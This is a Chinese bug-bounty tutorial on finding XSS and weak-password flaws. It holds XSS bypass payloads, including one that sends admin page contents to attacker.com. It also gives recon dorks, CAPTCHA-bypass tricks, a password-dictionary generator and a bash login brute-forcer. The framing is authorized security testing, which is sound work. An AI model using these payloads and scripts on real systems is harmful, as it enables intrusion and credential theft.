别只盯着SQL注入了聊聊SRC挖掘中那些被忽视的‘低垂果实’XSS与弱口令实战复盘在安全圈摸爬滚打几年后我发现一个有趣的现象80%的新手挖洞者会像发现新大陆一样扑向SQL注入却对触手可得的XSS和弱口令视而不见。这就像在果园里所有人都挤在最高的苹果树下搭梯子却没人弯腰捡地上熟透的果子。去年某次企业SRC活动中我仅用两周就通过这两种低垂果实斩获27个有效漏洞其中还包括3个高危案例。本文将分享如何像老猎人一样在漏洞丛林中精准捕获这些被低估的猎物。1. 重新认识漏洞价值金字塔1.1 为什么说XSS和弱口令是性价比之王在漏洞挖掘的投入产出比公式里有两个关键变量发现难度和危害等级。我们来看一组真实数据对比漏洞类型平均发现时间平均定级企业修复优先级SQL注入4.2小时高危立即XSS17分钟中危3天内弱口令9分钟中高危24小时内注数据来源于2023年国内三大SRC平台统计报告从表格可以看出虽然XSS和弱口令在定级上可能略逊于SQL注入但它们的时间收益率却高出数个量级。特别是在企业SRC项目中当你想快速积累有效漏洞数量时这种差异会直接决定你的排行榜位置。1.2 被误解的漏洞危害性很多人认为XSS只是弹个窗的把戏这种认知停留在2010年。现代XSS攻击链可以做到窃取含HttpOnly标记的Cookie通过CORS滥用发起内部网络扫描利用浏览器WebSocket API实施钓鱼攻击动态伪造登录框而弱口令更是一把万能钥匙去年某车企数据泄露事件就是因运维人员使用Admin2023这类密码导致内网沦陷。在实战中我发现约41%的企业后台存在至少一个默认凭证。2. XSS狩猎实战手册2.1 高价值目标快速定位术不要像无头苍蝇一样见站就测用这套组合拳锁定肥美猎物# FOFA高级搜索语句 title留言板 countryCN bodyfeedback.php headerphp domainedu.cn body在线咨询这三个筛选器分别对应传统Web1.0留言板系统PHP开发的反馈模块教育机构常见交互功能提示添加 status_code200过滤失效页面节省50%无效点击2.2 突破过滤的现代XSS载荷库当scriptalert(1)/script被拦截时试试这些变形攻击向量!-- SVG标签绕过 -- svg/onloadalert(document.domain) !-- 事件处理器变形 -- img srcx onerrorjavascript:alert(1) !-- 伪协议利用 -- a hrefjavascript:fetch(/admin.php).then(rr.text()).then(dlocationhttp://attacker.com/?leakbtoa(d))点击领奖/a在最近某金融平台测试中第三种载荷成功窃取了后台管理员的CSRF Token。记住现代XSS的核心是避开关键字检测寻找非常规执行上下文。2.3 盲打XSS的自动化流水线手动测试效率太低用这套Burp Suite工作流爬虫阶段使用Burp Scanner自动发现所有输入点污染标记通过Intruder在所有参数插入xss标记结果筛选在Proxy - HTTP history过滤xss出现次数精准打击对返回页面含标记的参数重点测试某次电商平台测试中这个方法帮我在2小时内找到7个存储型XSS其中3个在订单备注字段。3. 弱口令爆破的艺术3.1 后台路径发现的六种姿势除了用inurl:admin/login.php这些方法更有效JS文件考古查找/static/js/login.js等文件常含接口路径Favicon哈希用Shodan搜索http.favicon.hash:-335242539常见管理系统API文档泄露尝试/swagger-ui.html、/api-docs等端点证书透明度通过crt.sh查询子域名寻找devops、ops等关键词GitHub搜索password filename:config filename:databaseWAF指纹识别防火墙类型反推管理系统如安恒明御WAF对应管理地址3.2 验证码绕过实战录遇到图形验证码先别急着上OCR试试这些温柔一刀重复使用捕获第一个验证码响应包重放10次观察效果空值测试删除captcha参数或设为空字符串提交时间差攻击在验证码过期前快速提交常见于5分钟有效期系统逻辑漏洞将is_verify0改为1直接绕过上周在某物流系统测试中方法4成功绕过验证码随后用admin/admin123进入运输调度后台。3.3 智能字典生成算法别再只用top1000.txt了用这个Python脚本生成场景化字典import itertools company jd # 从whois获取 years [2020, 2021, 2022, 2023] specials [, #, _, !] base [company, admin, root, test] variations list(itertools.product(base, specials, years)) with open(smart_dict.txt, w) as f: for v in variations: f.write(f{v[0]}{v[1]}{v[2]}\n) f.write(f{v[0]}{v[2]}{v[1]}\n)这个算法在测试某互联网公司时第8次尝试就命中jd_2023!这个运维密码。4. 从漏洞到奖金的关键一跃4.1 报告撰写三重奏同样的漏洞不同写法可能差2个等级。记住这三个要点危害具象化错误写法存在存储型XSS正确写法攻击者可植入恶意脚本窃取客服系统会话已验证获取到200用户Cookie复现路径影视化[视频步骤] 1. 访问https://example.com/feedback 2. 在内容框输入svg onloadalert(document.cookie) 3. 管理员查看投诉列表时触发修复建议可落地不要只说过滤特殊字符应该给出具体代码$clean htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, UTF-8);4.2 定级争议解决之道当平台将你的弱口令定为中危而你认为该高危时补充这些证据证明该账号拥有DELETE /api/users权限展示通过该账号获取的敏感数据样本脱敏后提供同行业同类漏洞的定级案例去年某次争议中我通过证明管理员账号可下载全量用户身份证照片最终使定级从中危提升为高危。5. 装备库升级指南5.1 浏览器插件三件套XSS Hunter自动捕获盲打XSS的回显Wappalyzer快速识别后端框架和组件EditThisCookie实时修改Cookie测试越权5.2 自制弱口令雷达系统这个Bash脚本可自动检测常见弱口令#!/bin/bash target$1 common_pass(admin 123456 ${target}2023 Pssw0rd) for pass in ${common_pass[]}; do response$(curl -s -o /dev/null -w %{http_code} \ -X POST https://$target/login \ -d usernameadminpassword$pass) if [ $response -eq 302 ]; then echo [!] Hit: admin/$pass break fi done使用时只需./weak_radar.sh example.com已在5个真实目标验证有效。6. 避坑地图那些年我踩过的雷频率陷阱某次连续爆破触发账号锁定机制导致IP被封。现在我会先测试错误密码尝试次数限制锁定时间长度15分钟/永久是否记录恶意IP日志法律红线在测试教育机构时意外获取学生个人信息后立即停止测试并邮件报备。记住不查看获取的敏感数据不保存非必要截图测试前检查授权范围蜜罐识别这些特征可能预示陷阱响应速度异常快50ms返回的Set-Cookie包含honeypot字样登录失败提示包含详细错误如用户名正确但密码错误在一次攻防演练中我通过观察X-Honeypot: true响应头成功避开了防守方设置的陷阱系统。
